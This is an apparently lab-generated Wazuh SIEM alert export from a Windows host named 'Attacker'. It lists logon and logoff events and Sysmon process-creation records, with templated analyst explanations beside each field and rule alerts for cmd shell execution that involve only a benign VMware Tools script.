data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:18.8658429Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43983 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9532 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: No
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x31C1A7D
Linked Logon ID: 0x31B4686
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x624
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: ATTACKER
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x31c1a7d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: User32 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.workstationName: ATTACKER No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipAddress: 127.0.0.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipPort: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x31b4686 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534986.2436639 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4634 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12545 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:18.8727048Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43985 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 17252 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was logged off.
Subject:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x31C1A7D
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x31c1a7d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534986.2439107 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4634 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12545 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:18.8801986Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43986 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 17252 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was logged off.
Subject:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x31B4686
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x31b4686 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534986.2441575 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:18.8808370Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43987 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 2444 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534986.2448912 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:19.2315020Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43989 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 17252 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Suspicious Windows cmd shell execution Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92032 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087', 'T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery', 'Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery', 'Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534988.2456251 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:01.5883830Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 344551 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:49:01.506
ProcessGuid: {94294ddc-bfdd-680a-a90c-000000000e00}
ProcessId: 8208
Image: C:\Windows\System32\conhost.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Console Window Host
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: CONHOST.EXE
CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
CurrentDirectory: C:\WINDOWS
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D
ParentProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00}
ParentProcessId: 3372
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:49:01.506 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bfdd-680a-a90c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8208 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\conhost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Console Window Host No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: CONHOST.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3372 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Suspicious Windows cmd shell execution Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92032 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087', 'T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery', 'Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery', 'Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
